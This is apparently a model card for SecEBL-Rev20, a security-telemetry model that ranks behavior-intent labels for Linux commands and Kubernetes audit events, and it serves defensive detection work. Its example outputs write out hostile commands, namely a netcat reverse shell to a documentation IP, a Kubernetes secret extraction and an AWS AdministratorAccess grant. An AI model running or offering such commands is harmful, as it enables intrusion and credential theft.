SecEBL-Rev20

SecEBL stands for Security Event Behavior Labeler.

SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a Linux command line or normalized Kubernetes AuditLog event into ranked behavior-intent labels, so downstream detection can reason about what an actor is trying to do instead of only matching fixed strings, allowlists, blacklists, or opaque risk scores.

Project repository: github.com/EBWi11/SecEBL

At A Glance

| Area | Current release summary |
| --- | --- |
| Stable public API | L1 behavior-intent labeling with ranked top_labels. |
| Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. |
| Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. |
| Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. |
| Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. |
| L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. |
| Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. |
| Training setup | Alibaba-NLP/gte-modernbert-base, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. |

The public examples include a reviewed, publicly releasable subset of the internal Linux final benchmark plus normalized Kubernetes AuditLog examples: 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They exist so users can run the model locally and inspect outputs without access to private telemetry. The full training corpora, full internal benchmarks, private pressure-stream rows, and private run logs are not redistributed because parts of them contain real telemetry or real operational context.

First-Time User Path

Use the companion GitHub repository for the runnable code and this Hugging Face repository for model artifacts:

git clone https://github.com/EBWi11/SecEBL.git
cd SecEBL

git lfs install
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts

pip install -e .
scripts/run_examples.sh

After the script finishes, inspect:

runs/examples/linux_l1/predictions.jsonl
runs/examples/l2/example_linux_session_results.json

L1 is the stable behavior-labeling API. It outputs ranked behavior evidence, not an intrusion verdict. L2 is optional and experimental; it runs only when an L2 artifact such as model_artifacts/l2_artifacts/logreg.joblib is available.

What This Repository Contains

This Hugging Face repository is the model artifact bundle.

| Path | Purpose |
| --- | --- |
| model.safetensors, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
| semantic_texts.jsonl | Rev20 semantic label texts used by the L1 retrieval path. |
| schema/tags_schema_rev20.json | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
| examples/linux/ | Public subset of the internal Linux final benchmark and matching Rev20 labels. |
| examples/k8s/ | Public normalized Kubernetes AuditLog examples and matching Rev20 labels. |
| examples/manifest.json | Public example subset counts and distribution. |
| rev20_tag_rfc.md | Rev20 behavior-tag labeling RFC and boundary examples. |
| l2_artifacts/logreg.joblib | Experimental L2 logistic-regression session scorer. |
| l2_artifacts/tag_risk_policy.rev20.json | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
| l2_artifacts/train_summary.json | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. |
| LICENSE, NOTICE | Model license and attribution notices. |

This repository does not include the runnable helper scripts. Use EBWi11/SecEBL for the Python package and one-command test script. The same public benchmark-subset examples are included here for convenience.

Output Shape

L1 predictions expose ranked top_labels:

{
  "observation_id": "event:0",
  "command": "nc -e /bin/sh 203.0.113.10 4444",
  "top_labels": [
    {
      "label_id": "spawn_reverse_shell",
      "score": 0.811,
      "axis": "execution_and_process"
    },
    {
      "label_id": "connect_external_service",
      "score": 0.488,
      "axis": "network"
    }
  ]
}

L1 does not emit behavior_tags and does not apply a user-facing tag-selection threshold. behavior_tags[] is the field used by training and evaluation label files. Runtime prediction output is ranked top_labels.
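
Because L1 returns ranked evidence without a threshold, any cutoff is the caller's decision. The sketch below parses one record in the shape shown above and keeps the labels at or above a caller-chosen score. The helper name `labels_at_or_above` and the 0.5 cutoff are illustrative assumptions, not part of the release.

```python
import json

# One prediction record in the shape shown above (values copied from the example).
# In a JSONL file, each record would sit on a single line.
RECORD = """{"observation_id": "event:0",
 "command": "nc -e /bin/sh 203.0.113.10 4444",
 "top_labels": [
   {"label_id": "spawn_reverse_shell", "score": 0.811, "axis": "execution_and_process"},
   {"label_id": "connect_external_service", "score": 0.488, "axis": "network"}
 ]}"""


def labels_at_or_above(prediction: dict, min_score: float) -> list[str]:
    """Return label ids whose score meets a caller-chosen cutoff, in ranked order."""
    return [
        item["label_id"]
        for item in prediction["top_labels"]
        if item["score"] >= min_score
    ]


prediction = json.loads(RECORD)
# 0.5 is an arbitrary illustrative cutoff, not a recommended value.
print(labels_at_or_above(prediction, 0.5))  # ['spawn_reverse_shell']
```

Keeping the cutoff on the consumer side means the same cached top_labels can serve several downstream consumers with different tolerances.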

Why Intent Labels Matter

Traditional IDS pipelines often depend on signatures, rules, allowlists, blacklists, and low-explainability tabular ML. Those tools still matter, but they can struggle when legitimate tools are used in suspicious ways, when tool syntax drifts quickly, or when the same behavior appears in different telemetry formats.

SecEBL adds an intermediate representation:

raw security event
  -> L1 behavior-intent recognition
  -> L2 session reasoning or another downstream detector
  -> alert / review / policy

L1 intentionally does not decide that a single event is an intrusion. It produces explainable behavior evidence such as read_credential_material, execute_remote_command, create_scheduled_task, grant_cluster_privilege, or query_service_health.

This is useful for:

  • LOTL / living-off-the-land behavior where the tool is legitimate but the behavior may be suspicious in context.
  • Rule-writing lag, where new tool syntax appears faster than signatures can be maintained.
  • Multi-platform telemetry, where Linux commands, Kubernetes audit events, and future telemetry can share a behavior vocabulary.
  • Explainable detection, where an alert should be tied to explicit behavior labels rather than only an opaque score.
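
As one illustration of "another downstream detector" in the pipeline above, the sketch below applies an ordered-behavior rule to a session's L1 output. The rule itself, the function names, and the sample scores are hypothetical; only the label ids and the top_labels shape come from this document.

```python
from typing import Iterable


def top_label_ids(prediction: dict, k: int = 3) -> set[str]:
    """Collect the ids of the k highest-ranked labels for one event."""
    return {item["label_id"] for item in prediction["top_labels"][:k]}


def credential_read_then_egress(session: Iterable[dict]) -> bool:
    """Hypothetical rule: a credential read followed by a later external connection."""
    saw_credential_read = False
    for prediction in session:
        labels = top_label_ids(prediction)
        # Check egress first so the rule only fires on a strictly later event.
        if saw_credential_read and "connect_external_service" in labels:
            return True
        if "read_credential_material" in labels:
            saw_credential_read = True
    return False


# Illustrative session; the scores are made up for the example.
session = [
    {"top_labels": [{"label_id": "read_credential_material", "score": 0.70}]},
    {"top_labels": [{"label_id": "connect_external_service", "score": 0.73}]},
]
print(credential_read_then_egress(session))        # True
print(credential_read_then_egress(session[::-1]))  # False
```

The rule reasons over behavior labels only, so the same logic could apply to any telemetry source that is mapped into the shared vocabulary.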

Data And Vocabulary

Rev20 is a flat behavior-tag schema.

| Item | Count |
| --- | --- |
| Top-level behavior groups | 12 |
| Behavior tags | 361 |

Schema groups:

| Group | Tags |
| --- | --- |
| observation_and_discovery | 51 |
| configuration_and_log_modification | 12 |
| filesystem_and_data | 33 |
| execution_and_process | 28 |
| network | 51 |
| identity_auth_and_secrets | 31 |
| persistence_services_and_storage | 27 |
| kernel_memory_and_tracing | 14 |
| package_build_and_source | 19 |
| database_and_infrastructure_services | 33 |
| containers_and_cloud_native | 34 |
| cloud_control_plane | 28 |
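
The per-group counts above can be checked against the headline vocabulary size with a few lines of arithmetic. The dictionary name is illustrative; the numbers are copied from the schema groups listed above.

```python
# Per-group tag counts copied from the schema groups above.
GROUP_TAG_COUNTS = {
    "observation_and_discovery": 51,
    "configuration_and_log_modification": 12,
    "filesystem_and_data": 33,
    "execution_and_process": 28,
    "network": 51,
    "identity_auth_and_secrets": 31,
    "persistence_services_and_storage": 27,
    "kernel_memory_and_tracing": 14,
    "package_build_and_source": 19,
    "database_and_infrastructure_services": 33,
    "containers_and_cloud_native": 34,
    "cloud_control_plane": 28,
}

group_count = len(GROUP_TAG_COUNTS)
tag_total = sum(GROUP_TAG_COUNTS.values())
print(group_count, tag_total)  # 12 361
```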

The release baseline was trained from internal Rev20 corpora:

| Corpus | Rows | Unique behavior tags | Notes |
| --- | --- | --- | --- |
| Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. |
| Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. |

The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a conservative executable-name estimate. Common families include shell utilities, network tools, package/build tools, cloud CLIs, IaC tools, container tooling, databases, secret stores, and Kubernetes tooling.

Training Details

The raw training corpora are not redistributed, but the following details are documented so readers can understand the model scale and method.

| Item | Value |
| --- | --- |
| Base model | Alibaba-NLP/gte-modernbert-base |
| Training objective | MultipleNegativesRankingLoss with hard-negative-aware batches |
| Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, cuda:0 |
| Epochs | 128 full-pass epochs |
| Batch size | 112 |
| Precision | fp32 |
| Steps | 1,062 steps per epoch; 135,936 total optimizer steps |
| Runtime | 58,291 seconds, about 16.2 hours |
| Sequence length | 160 tokens |
| Optimizer schedule | learning rate 2e-5, warmup ratio 0.06, 8,156 warmup steps, weight decay 0.01 |

Training data scale:

| Training artifact | Count | Notes |
| --- | --- | --- |
| Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. |
| Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. |
| Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. |
| Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. |
| Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. |
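
The counts in the two tables above are mutually consistent, which the following worked arithmetic makes explicit. It assumes one optimizer step per batch with the final partial batch kept, and that warmup steps are rounded down; both are assumptions that happen to reproduce the reported figures, not documented trainer settings.

```python
import math

# Figures copied from the training tables above.
linux_rows, k8s_rows = 85_277, 1_008
abstain_rows = 3_390
base_pairs, effective_pairs = 117_092, 118_858
batch_size, epochs = 112, 128
warmup_ratio = 0.06
runtime_seconds = 58_291

corpus_rows = linux_rows + k8s_rows             # 86,285 combined rows
usable_rows = corpus_rows - abstain_rows        # 82,895 non-empty observations
extra_exposures = effective_pairs - base_pairs  # 1,766 pairs added by upsampling

# Assumption: one optimizer step per batch, final partial batch kept.
steps_per_epoch = math.ceil(effective_pairs / batch_size)  # 1,062
total_steps = steps_per_epoch * epochs                     # 135,936
# Assumption: rounding down reproduces the reported 8,156 warmup steps.
warmup_steps = math.floor(warmup_ratio * total_steps)
runtime_hours = runtime_seconds / 3600                     # about 16.2

print(corpus_rows, usable_rows, extra_exposures)
print(steps_per_epoch, total_steps, warmup_steps, round(runtime_hours, 1))
```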

The Linux corpus is intentionally mixed rather than a single synthetic source. The largest source slices are roughly 36.9k generated rows, 28.5k manually reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack batch rows, plus smaller targeted boundary, miss-review, public-attack, and high-miss batches.

Token lengths are short enough for a compact encoder. Across the final pair set, command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than 0.3% of examples exceed the 160-token training limit. Label-side semantic texts are p50 40 tokens and p95 62.

Hard negatives were designed in two layers (schema-level and batch-level), complemented by targeted boundary upsampling:

  • Schema-level negatives: the dataset builder used schema_hard, with a 16-item hard-negative pool and up to 8 negatives per positive before MNRL batching. These negatives come from semantically nearby Rev20 tags, so the model is forced to separate labels such as read-vs-search, inspect-vs-modify, local-vs-remote execution, and similar tool-boundary cases.
  • Batch-level negatives: the training loader used hard-negative-aware MNRL batches. The final run used config rev20_conservative_20260620_ep96_miss_v11, covering 74 difficult labels and placing 2 hard-negative labels near each anchor where possible.
  • Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, producing 1,766 extra training exposures. These rows target recurring failure modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, no-hit review cases, and post-evaluation miss-review batches.
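
To make the objective behind these layers concrete, here is a minimal NumPy sketch of a multiple-negatives ranking loss. It is an illustration under stated assumptions, not the release training code: each anchor is scored against every positive in the batch plus any explicit hard negatives, and cross-entropy pulls the matching positive to the top. The scale of 20 mirrors the default in sentence-transformers' MultipleNegativesRankingLoss; the toy vectors are made up.

```python
import numpy as np


def mnrl_loss(anchors, positives, hard_negatives=None, scale=20.0):
    """Cross-entropy over scaled cosine similarities; row i's target is positive i."""
    def normalize(x):
        return x / np.linalg.norm(x, axis=1, keepdims=True)

    a = normalize(np.asarray(anchors, dtype=np.float64))
    candidates = np.asarray(positives, dtype=np.float64)
    if hard_negatives is not None:
        # Hard negatives become extra candidate columns that every anchor must reject.
        candidates = np.vstack([candidates, np.asarray(hard_negatives, dtype=np.float64)])
    c = normalize(candidates)

    logits = scale * (a @ c.T)                    # shape: (batch, n_candidates)
    logits -= logits.max(axis=1, keepdims=True)   # numerical stability
    log_probs = logits - np.log(np.exp(logits).sum(axis=1, keepdims=True))
    idx = np.arange(a.shape[0])
    return float(-log_probs[idx, idx].mean())


# Toy batch: three commands whose embeddings match their own labels exactly.
anchors = np.eye(3)
positives = np.eye(3)
easy = mnrl_loss(anchors, positives)
# A hard negative that sits close to the first anchor raises the loss.
hard = mnrl_loss(anchors, positives, hard_negatives=[[0.9, 0.1, 0.0]])
print(easy < hard)  # True
```

A nearby negative contributes far more loss than an unrelated one, which is why drawing negatives from semantically adjacent tags sharpens boundaries such as read-vs-search.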

Public Benchmark Subset

This Hugging Face repository includes the same public benchmark examples as the companion GitHub repository: the Linux benchmark subset under examples/linux/ and normalized Kubernetes AuditLog examples under examples/k8s/.

| Public artifact | Rows | Sessions | Notes |
| --- | --- | --- | --- |
| examples/linux/example_sessions.jsonl | 10,520 | 531 | Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. |
| examples/linux/example_gold.rev20.jsonl | 10,520 | 531 | Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. |
| examples/k8s/example_sessions.jsonl | 144 | 46 | Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. |
| examples/k8s/example_gold.rev20.jsonl | 144 | 46 | Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. |

Session-level labels use English enums: normal_operation and intrusion. The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions, and complete 361-tag coverage.

Evaluation Snapshot

The full internal benchmark data is not public. The aggregate size, distribution, and metrics are public so users can understand what the headline numbers mean.

Evaluation scale:

| Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags |
| --- | --- | --- | --- | --- |
| Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 |
| K8s evaluation set | 144 | 144 | 163 | 27 / 361 |
| Combined | 12,738 | 12,033 | 17,450 | 361 / 361 |

Retrieval quality:

| Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
| --- | --- | --- | --- | --- |
| Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% |
| K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% |
| Combined | 87.47% | 98.50% | 95.50% | 96.47% |

The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes complex multi-tag command rows. The K8s result should be read as a small-domain sanity result rather than broad Kubernetes coverage because the current K8s corpus is much smaller than the Linux corpus.
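
The metric names above are not formally defined in this card. The sketch below shows one plausible reading of the three top-5 metrics, assuming rows without gold labels are excluded and that micro recall counts gold tag instances; "dynamic exact" is not reconstructed here because its selection rule is not described. The function name and toy data are illustrative.

```python
def top5_metrics(gold: list[set[str]], ranked: list[list[str]], k: int = 5) -> dict[str, float]:
    """Compute any-hit, all-covered, and micro recall over rows that have gold tags."""
    labeled_rows = any_hit = all_covered = 0
    hit_instances = gold_instances = 0
    for gold_tags, predicted in zip(gold, ranked):
        if not gold_tags:
            continue  # assumption: unlabeled (abstain) rows are excluded
        labeled_rows += 1
        hits = gold_tags & set(predicted[:k])
        any_hit += bool(hits)             # at least one gold tag in the top k
        all_covered += hits == gold_tags  # every gold tag in the top k
        hit_instances += len(hits)
        gold_instances += len(gold_tags)
    return {
        "top5_any_hit": any_hit / labeled_rows,
        "top5_all_covered": all_covered / labeled_rows,
        "micro_recall_at_5": hit_instances / gold_instances,
    }


# Toy data: three labeled rows and one unlabeled row.
gold = [{"a"}, {"a", "b"}, {"c"}, set()]
ranked = [["a", "x"], ["a", "y"], ["z"], ["q"]]
metrics = top5_metrics(gold, ranked)
print(metrics)
```

Under this reading, multi-tag rows explain why all-covered sits below any-hit: a row with two gold tags counts as a hit when one is retrieved but is only covered when both are.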

Internal Linux benchmark tag cardinality:

| Tags per row | Rows |
| --- | --- |
| 0 | 705 |
| 1 | 8,829 |
| 2 | 1,567 |
| 3 | 901 |
| 4 | 402 |
| 5 | 139 |
| 6+ | 51 |

Top internal Linux benchmark tags:

| Tag | Count |
| --- | --- |
| stage_temporary_path | 987 |
| inspect_network_state | 801 |
| stage_hidden_path | 655 |
| inspect_current_identity | 578 |
| read_credential_material | 551 |
| inspect_system_state | 481 |
| inspect_infrastructure_service | 390 |
| query_dns_records | 372 |
| enumerate_filesystem | 365 |
| search_credentials | 315 |

Example Outputs

These examples show the user-facing L1 output style. Scores are cosine-similarity retrieval scores computed with the release prompt profile applied. The public helper scripts save the top labels in predictions.jsonl.

| Event | Top 3 L1 tags (score) | Note |
| --- | --- | --- |
| nc -e /bin/sh 203.0.113.10 4444 | spawn_reverse_shell (0.811), connect_external_service (0.488), spawn_bind_shell (0.451) | -e is recognized as reverse-shell execution. |
| nc -v 203.0.113.10 443 | connect_external_service (0.732), spawn_reverse_shell (0.503), create_reverse_tunnel (0.412) | Connection intent ranks above shell-spawn intent. |
| cat /root/install.log | read_business_log (0.641), read_system_log (0.431), read_workload_logs (0.385) | Log-read semantics dominate. |
| cat /root/install.conf | read_infrastructure_config (0.620), read_system_config (0.612), read_kernel_parameter (0.336) | Config-read semantics dominate. |
| kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d | read_cluster_secret (0.730), decode_data (0.716), read_credential_material (0.363) | K8s secret extraction and decoding. |
| aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess | grant_cloud_privilege (0.838), modify_cloud_identity_policy (0.535), modify_cloud_identity (0.459) | Cloud privilege escalation semantics. |
| curl -fsS http://127.0.0.1:8080/healthz | query_service_health (0.840), inspect_local_kubernetes_cluster (0.459), inspect_container_runtime (0.383) | Local service health check. |

Runtime Performance

SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 tag definitions. The serving path embeds the event, embeds or loads tag definition embeddings, then ranks tags by similarity.

Current single-card CUDA recommendation:

| Setting | Value |
| --- | --- |
| Precision | FP16 |
| Attention | SDPA |
| max_seq_length | 160 |
| Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default |
| Sorting | sort_by=char |
| Padding | dynamic, no forced pad alignment |
| Output path | GPU tensor output plus GPU top-k |
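
Sorting pairs naturally with dynamic padding: when similar-length inputs share a batch, fewer pad tokens are wasted. The sketch below assumes sort_by=char means ordering by character length, which is an interpretation rather than documented behavior. The function names are hypothetical, and `process_batch` stands in for the real encoder call.

```python
def length_sorted_batches(texts: list[str], batch_size: int) -> list[list[int]]:
    """Return batches of original indices, ordered by character length."""
    order = sorted(range(len(texts)), key=lambda i: len(texts[i]))
    return [order[i:i + batch_size] for i in range(0, len(order), batch_size)]


def run_in_sorted_batches(texts, batch_size, process_batch):
    """Process similar-length texts together, then restore the input order."""
    results = [None] * len(texts)
    for batch in length_sorted_batches(texts, batch_size):
        outputs = process_batch([texts[i] for i in batch])
        for index, output in zip(batch, outputs):
            results[index] = output
    return results


texts = ["kubectl get pods -A", "id", "cat /etc/passwd", "ls"]
batches = length_sorted_batches(texts, 2)
# Stand-in for the encoder: return each text's length.
lengths = run_in_sorted_batches(texts, 2, lambda batch: [len(t) for t in batch])
print(batches)  # [[1, 3], [2, 0]]
print(lengths)  # [19, 2, 15, 2]
```

Results are written back by original index, so callers see outputs in input order regardless of how batches were formed.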

Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:

| Mode | Result |
| --- | --- |
| Recommended no-cache unique inference, bs224 | mean 5,308.72 unique cmdlines/s |
| Recommended no-cache latency, bs224 | about 0.1884 ms per unique cmdline |
| bs224 repeat range | 5,025.47 - 5,433.78 unique cmdlines/s |
| Best quick-sweep point, bs384 | 5,378.45 unique cmdlines/s |
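
The per-cmdline figure above matches the reciprocal of the mean throughput, so it reads most naturally as amortized time per item rather than the round-trip latency of a single request. The short calculation below shows the conversion; the implied per-batch time is a derived estimate, not a measured value.

```python
throughput_per_s = 5308.72  # mean unique cmdlines/s at batch size 224
batch_size = 224

ms_per_cmdline = 1000.0 / throughput_per_s  # amortized time per item
batch_ms = batch_size * ms_per_cmdline      # implied time for one full batch

print(round(ms_per_cmdline, 4))  # 0.1884
print(round(batch_ms, 1))        # 42.2
```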

Exact raw-event cache lookup was measured separately at mean 1,817,462.76 rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
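
A minimal sketch of the exact-match idea follows, assuming the cache key is the raw event string itself. The class name, the `predict_batch` callable, and the stub predictor are hypothetical; the release's cache implementation is not described in this card.

```python
class ExactEventCache:
    """Map exact raw-event strings to saved top-k results."""

    def __init__(self, predict_batch):
        self._predict_batch = predict_batch  # callable: list[str] -> list[result]
        self._store: dict[str, object] = {}
        self.model_calls = 0

    def lookup(self, events: list[str]) -> list[object]:
        # Deduplicate misses while preserving first-seen order.
        misses = list(dict.fromkeys(e for e in events if e not in self._store))
        if misses:
            self.model_calls += 1
            for event, result in zip(misses, self._predict_batch(misses)):
                self._store[event] = result
        # Hits are served from the store without touching the model.
        return [self._store[e] for e in events]


# Stub predictor standing in for L1 inference.
cache = ExactEventCache(lambda batch: [e.upper() for e in batch])
first = cache.lookup(["ls", "ls", "id"])
second = cache.lookup(["id", "ls"])
print(first, second, cache.model_calls)
```

Only unique unseen events reach the model, which is why the throughput figures above are quoted per unique cmdline and the cache rate is reported separately.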

L2 Artifact

This repository includes an experimental fitted L2 session scorer. When this model directory is used as MODEL_DIR, the companion repository's scripts/run_examples.sh runs the public Linux and K8s L1 examples and also scores the Linux example sessions.

In this release, a session is a sequence of events grouped by session_id. L1 labels each event independently. L2 scores the whole session by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions, and routine-operation context. The L2 output is a session-level verdict such as intrusion or normal_operation, not a replacement for per-command behavior tags.

For compatibility with the released L2 artifact, L2 derives its session features from cached L1 top_labels using an internal selected-tag feature path. In plain terms, L2 filters the cached ranked labels inside its own feature builder before session scoring. This does not change L1 prediction output: users still receive ranked top_labels, not a selected behavior_tags field.

Runtime L2 does not use raw command text, user names, host names, or session ids as scoring features. Session ids may appear in private data-prep workflows for label assignment, but they are not runtime allow/deny lists.
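
To illustrate the kind of aggregation described above, the sketch below derives a few session-level features from cached top_labels only, never reading the raw command text. The feature names and definitions are hypothetical stand-ins; the released feature builder and its tag-selection policy are internal and may differ.

```python
def session_features(predictions: list[dict], k: int = 3) -> dict[str, float]:
    """Aggregate per-event ranked labels into simple session-level features."""
    ranked = [p["top_labels"][:k] for p in predictions if p["top_labels"]]
    top1_ids = [labels[0]["label_id"] for labels in ranked]
    distinct = {item["label_id"] for labels in ranked for item in labels}
    # Count changes of the top-ranked behavior between consecutive events.
    transitions = sum(a != b for a, b in zip(top1_ids, top1_ids[1:]))
    mean_top1 = (
        sum(labels[0]["score"] for labels in ranked) / len(ranked) if ranked else 0.0
    )
    return {
        "event_count": float(len(ranked)),
        "distinct_tags": float(len(distinct)),
        "top1_transitions": float(transitions),
        "mean_top1_score": mean_top1,
    }


# Illustrative session; the scores are made up for the example.
example_session = [
    {"top_labels": [{"label_id": "inspect_current_identity", "score": 0.8}]},
    {"top_labels": [{"label_id": "read_credential_material", "score": 0.6}]},
    {"top_labels": [{"label_id": "read_credential_material", "score": 0.7}]},
]
features = session_features(example_session)
print(features)
```

A fixed-length feature vector like this is what a session scorer such as a logistic regression would consume.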

Internal L2 summary:

| Check | Result |
| --- | --- |
| Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
| Out-of-fold (OOF) validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |

The 7M pressure-stream result was measured on real background telemetry plus embedded synthetic attack sessions. The underlying rows and real session identifiers are not redistributed. The included L2 artifact is a research/reproducibility component, not a general production IDS claim.
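
For readers who want to relate the counts above to standard metrics, a short calculation follows. The helper name is illustrative. The alert rate is only the share of sessions that alerted: the stream contains embedded synthetic attack sessions, so it should not be read as a false-positive rate.

```python
def binary_metrics(tp: int, tn: int, fp: int, fn: int) -> dict[str, float]:
    """Accuracy, precision, and recall from confusion-matrix counts."""
    total = tp + tn + fp + fn
    return {
        "accuracy": (tp + tn) / total,
        "precision": tp / (tp + fp) if tp + fp else 0.0,
        "recall": tp / (tp + fn) if tp + fn else 0.0,
    }


# Withheld Linux session benchmark counts from the summary above.
held_out = binary_metrics(tp=365, tn=298, fp=0, fn=0)
# Share of pressure-stream sessions that raised an alert.
alert_rate = 61 / 102_117

print(held_out)
print(f"{alert_rate:.4%}")  # about 0.06% of sessions
```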

Direct SentenceTransformers Loading

You can load the embedding model directly:

from sentence_transformers import SentenceTransformer

model = SentenceTransformer("willchen0011/SecEBL")

Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler: encode the event, encode or load the Rev20 semantic label texts from semantic_texts.jsonl, rank labels by cosine similarity, and save the top-k labels. For normal use, prefer the companion GitHub helpers because they keep the prompt profile, semantic text loading, top-k output format, and optional L2 feature path aligned with this release.
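
The ranking step described above can be sketched independently of the model. In the example below, toy vectors stand in for embeddings that would come from `model.encode(...)`. The release prompt profile and the field layout of semantic_texts.jsonl are not reproduced here, so this is a hedged illustration of the cosine ranking only, and `rank_labels` is a hypothetical name.

```python
import numpy as np


def rank_labels(event_vec, label_vecs, label_ids, k=5):
    """Rank label ids by cosine similarity to one event embedding."""
    event = np.asarray(event_vec, dtype=np.float64)
    labels = np.asarray(label_vecs, dtype=np.float64)
    event = event / np.linalg.norm(event)
    labels = labels / np.linalg.norm(labels, axis=1, keepdims=True)
    scores = labels @ event
    order = np.argsort(-scores)[:k]
    return [{"label_id": label_ids[i], "score": float(scores[i])} for i in order]


# Toy embeddings; with the real model these would come from model.encode(...)
# applied to the event text and to the Rev20 semantic label texts.
label_ids = ["spawn_reverse_shell", "connect_external_service", "query_service_health"]
label_vecs = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
event_vec = [0.9, 0.4, 0.1]

top = rank_labels(event_vec, label_vecs, label_ids, k=2)
print([item["label_id"] for item in top])
# ['spawn_reverse_shell', 'connect_external_service']
```

Label embeddings depend only on the fixed vocabulary, so they can be computed once and reused across events.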

Intended Use

  • Research and evaluation of security-event behavior labeling.
  • Internal security detection, investigation, and triage for systems an organization owns, operates, administers, or is explicitly authorized to defend.
  • Building session-level risk scoring over SecEBL behavior-label streams.

Out Of Scope

  • Standalone verdicting on a single event.
  • Authorization or policy-compliance decisions without human validation.
  • Monitoring systems you are not authorized to defend.
  • Commercial security products, SaaS/API offerings, MDR/MSSP services, or third-party managed detection without a separate written commercial license.

License

The model artifacts are released under SecEBL Model License 1.0. This is an open-weight restricted-use model license, not Apache-2.0 and not an OSI-approved open source license.

The base model is Alibaba-NLP/gte-modernbert-base, which is Apache-2.0. Source code, schemas, public examples, public documentation, and helper scripts in the companion GitHub repository (EBWi11/SecEBL) are Apache-2.0 unless a file explicitly states otherwise. Public examples and documentation included in this Hugging Face repository follow that same companion-repository licensing unless a file explicitly states otherwise.

Commercial security offerings require a separate written commercial license.
